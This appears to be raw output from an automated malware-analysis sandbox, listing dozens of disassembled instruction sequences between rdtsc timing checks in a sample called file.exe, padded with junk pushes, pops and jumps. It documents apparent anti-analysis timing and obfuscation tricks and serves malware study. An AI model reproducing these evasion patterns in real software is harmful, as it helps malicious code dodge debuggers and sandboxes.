Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF2339 second address: CF2370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6268DAF3D5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6268DAF3D8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF2370 second address: CF2378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF5070 second address: CF5077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D03268 second address: D03270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D03270 second address: D0328C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6268DAF3D7h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09C28 second address: D09C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09C30 second address: D09C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6268DAF3D0h 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6268DAF3CFh 0x00000013 jmp 00007F6268DAF3CCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A02E second address: D0A034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A034 second address: D0A043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jne 00007F6268DAF3CEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A043 second address: D0A050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A050 second address: D0A06C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A06C second address: D0A07C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F626941E956h 0x0000000a jp 00007F626941E956h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A07C second address: D0A080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A1E4 second address: D0A1EE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F626941E956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A1EE second address: D0A202 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F6268DAF3C6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c jnp 00007F6268DAF3D2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A202 second address: D0A222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F626941E956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F626941E960h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A222 second address: D0A244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6268DAF3D9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A244 second address: D0A24D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A534 second address: D0A53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A53E second address: D0A545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F5F4 second address: D0F600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1BFCF second address: D1BFDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1BFDB second address: D1BFE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1BFE0 second address: D1BFE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1BFE5 second address: D1BFF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6268DAF3C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1BFF1 second address: D1C002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F626941E956h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1C002 second address: D1C00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1C00C second address: D1C016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1C016 second address: D1C01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1C01E second address: D1C026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1C026 second address: D1C02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2FCBA second address: D2FCC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2FCC3 second address: D2FCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2FCC9 second address: D2FCF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F626941E956h 0x0000000a je 00007F626941E956h 0x00000010 popad 0x00000011 jno 00007F626941E962h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2FCF2 second address: D2FCF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2FCF6 second address: D2FD13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F626941E963h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2FD13 second address: D2FD1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D440EA second address: D4410A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F626941E956h 0x0000000d jmp 00007F626941E963h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4410A second address: D4410E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D44276 second address: D4427F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4427F second address: D44285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D44285 second address: D442CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E95Ah 0x00000007 jmp 00007F626941E965h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f jmp 00007F626941E962h 0x00000014 pop edi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 jl 00007F626941E956h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D442CD second address: D442D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D442D3 second address: D442D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D442D7 second address: D442E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D44617 second address: D4461B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4461B second address: D44621 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D44621 second address: D44640 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E964h 0x00000007 pushad 0x00000008 jp 00007F626941E956h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D44ABE second address: D44AC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45060 second address: D45076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E960h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45076 second address: D4507A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47E13 second address: D47E28 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F626941E956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F626941E95Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47E28 second address: D47E2D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47E2D second address: D47E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626941E95Eh 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4AAB2 second address: D4AAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4D489 second address: D4D48F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4D48F second address: D4D4A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F6268DAF3C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4D4A1 second address: D4D4A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EED5 second address: D4EF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jnl 00007F6268DAF3ECh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4EF0C second address: D4EF30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F626941E969h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C1AE second address: C6C1B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C1B4 second address: C6C1B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B20338 second address: 4B20354 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 1129h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6268DAF3CEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B20354 second address: 4B20358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B20358 second address: 4B2035E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B2035E second address: 4B2038D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F626941E95Ch 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F626941E95Eh 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov edi, 4CC5EB70h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B2038D second address: 4B20392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B2044A second address: 4B2044F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B2044F second address: 4B2048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6268DAF3D5h 0x0000000a xor ecx, 1A28F3D6h 0x00000010 jmp 00007F6268DAF3D1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d movsx edi, ax 0x00000020 movzx esi, bx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B2048F second address: 4B20495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B20495 second address: 4B20499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B20499 second address: 4B2049D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B5061F second address: 4B50623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50623 second address: 4B5063C instructions: 0x00000000 rdtsc 0x00000002 mov cl, dl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, 21546683h 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushad 0x0000000f mov ecx, 77FD6D71h 0x00000014 mov bh, cl 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B5063C second address: 4B506C8 instructions: 0x00000000 rdtsc 0x00000002 mov di, EE48h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d movsx edx, cx 0x00000010 mov ebx, eax 0x00000012 popad 0x00000013 movzx ecx, dx 0x00000016 popad 0x00000017 push esi 0x00000018 pushad 0x00000019 movzx esi, dx 0x0000001c pushfd 0x0000001d jmp 00007F6268DAF3CBh 0x00000022 sbb si, 313Eh 0x00000027 jmp 00007F6268DAF3D9h 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [esp], ecx 0x00000031 pushad 0x00000032 push esi 0x00000033 call 00007F6268DAF3D3h 0x00000038 pop ecx 0x00000039 pop edi 0x0000003a mov ecx, 25BDF605h 0x0000003f popad 0x00000040 xchg eax, esi 0x00000041 jmp 00007F6268DAF3D0h 0x00000046 push eax 0x00000047 jmp 00007F6268DAF3CBh 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B506C8 second address: 4B506CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50792 second address: 4B50817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6268DAF3D0h 0x00000009 or cx, 7608h 0x0000000e jmp 00007F6268DAF3CBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F6268DAF3D8h 0x0000001a and al, 00000068h 0x0000001d jmp 00007F6268DAF3CBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 cmp dword ptr [ebp-04h], 00000000h 0x0000002a jmp 00007F6268DAF3D6h 0x0000002f mov esi, eax 0x00000031 pushad 0x00000032 mov edi, eax 0x00000034 mov ebx, eax 0x00000036 popad 0x00000037 je 00007F6268DAF443h 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F6268DAF3CBh 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50817 second address: 4B5084B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F626941E95Fh 0x00000009 sub cx, 11BEh 0x0000000e jmp 00007F626941E969h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B5089E second address: 4B5000F instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov si, 2C1Dh 0x0000000b popad 0x0000000c pop esi 0x0000000d pushad 0x0000000e mov cl, C1h 0x00000010 pushfd 0x00000011 jmp 00007F6268DAF3CBh 0x00000016 xor eax, 77ADDE8Eh 0x0000001c jmp 00007F6268DAF3D9h 0x00000021 popfd 0x00000022 popad 0x00000023 leave 0x00000024 pushad 0x00000025 mov edi, esi 0x00000027 jmp 00007F6268DAF3D8h 0x0000002c popad 0x0000002d retn 0004h 0x00000030 nop 0x00000031 cmp eax, 00000000h 0x00000034 setne al 0x00000037 xor ebx, ebx 0x00000039 test al, 01h 0x0000003b jne 00007F6268DAF3C7h 0x0000003d xor eax, eax 0x0000003f sub esp, 08h 0x00000042 mov dword ptr [esp], 00000000h 0x00000049 mov dword ptr [esp+04h], 00000000h 0x00000051 call 00007F626CE5B6A1h 0x00000056 mov edi, edi 0x00000058 pushad 0x00000059 mov edi, eax 0x0000005b popad 0x0000005c xchg eax, ebp 0x0000005d pushad 0x0000005e pushad 0x0000005f mov ax, E3CDh 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B5000F second address: 4B5001E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ch, 59h 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B5001E second address: 4B50022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50022 second address: 4B50039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E963h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50039 second address: 4B5008C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F6268DAF3CCh 0x00000011 adc al, FFFFFFA8h 0x00000014 jmp 00007F6268DAF3CBh 0x00000019 popfd 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e movsx edi, cx 0x00000021 mov bx, si 0x00000024 popad 0x00000025 push FFFFFFFEh 0x00000027 pushad 0x00000028 mov esi, 5CFF15ABh 0x0000002d push eax 0x0000002e push edx 0x0000002f movzx esi, dx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B5008C second address: 4B500EB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F626941E963h 0x00000008 jmp 00007F626941E963h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push 128BA6F1h 0x00000016 jmp 00007F626941E95Fh 0x0000001b xor dword ptr [esp], 672138B9h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F626941E965h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B500EB second address: 4B500F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B500F1 second address: 4B500F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B500F5 second address: 4B50181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 43066C7Eh 0x0000000d jmp 00007F6268DAF3D4h 0x00000012 xor dword ptr [esp], 36A3470Eh 0x00000019 jmp 00007F6268DAF3D0h 0x0000001e mov eax, dword ptr fs:[00000000h] 0x00000024 pushad 0x00000025 push esi 0x00000026 movsx edx, si 0x00000029 pop ecx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F6268DAF3D5h 0x00000031 add esi, 178A2CA6h 0x00000037 jmp 00007F6268DAF3D1h 0x0000003c popfd 0x0000003d popad 0x0000003e popad 0x0000003f push esp 0x00000040 jmp 00007F6268DAF3CAh 0x00000045 mov dword ptr [esp], eax 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b movsx edx, si 0x0000004e push ecx 0x0000004f pop edi 0x00000050 popad 0x00000051 rdtsc
